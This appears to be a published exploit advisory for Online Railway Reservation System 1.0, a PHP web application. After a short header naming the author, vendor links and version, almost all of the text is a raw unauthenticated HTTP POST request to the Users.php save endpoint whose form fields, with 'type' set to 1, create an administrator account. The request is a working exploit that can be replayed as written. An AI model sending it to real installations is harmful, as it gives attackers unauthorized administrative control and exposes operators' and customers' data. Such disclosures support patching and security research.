Online Railway Reservation System version 1.0 suffers from an administrative account creation vulnerability.
f2d1bce831fb6d7cf35634e3999ff1c2
#Exploit Title: Online Railway Reservation System 1.0 - Admin Account Creation (Unauthenticated)
#Date: 07/01/2022
#Exploit Author: Zachary Asher
#Vendor Homepage: https://www.sourcecodester.com/php/15121/online-railway-reservation-system-phpoop-project-free-source-code.html
#Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/orrs.zip
#Version: 1.0
#Tested on: Online Railway Reservation System 1.0
=====================================================================================================================================
Account Creation
=====================================================================================================================================
POST /orrs/classes/Users.php?f=save HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------344736580936503100812880815036
Content-Length: 602
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="firstname"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="lastname"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="username"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="password"
testing
-----------------------------344736580936503100812880815036
Content-Disposition: form-data; name="type"
1